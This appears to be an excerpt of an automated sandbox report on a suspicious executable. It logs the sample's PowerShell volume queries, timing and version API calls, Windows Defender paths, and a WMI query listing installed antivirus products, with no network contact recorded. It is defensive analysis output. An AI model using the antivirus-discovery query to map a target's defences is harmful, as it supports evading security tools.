Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D18BF4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter, 0_2_00007FF776D18BF4
Source: C:\Users\user\Desktop\XgKnAQpuPM.exe Code function: 0_2_00007FF776D13D34 GetVersionExA,MessageBeep,MessageBoxA, 0_2_00007FF776D13D34
Source: Amcache.hve.10.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.10.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.10.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.10.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.10.dr Binary or memory string: MsMpEng.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
No contacted IP infos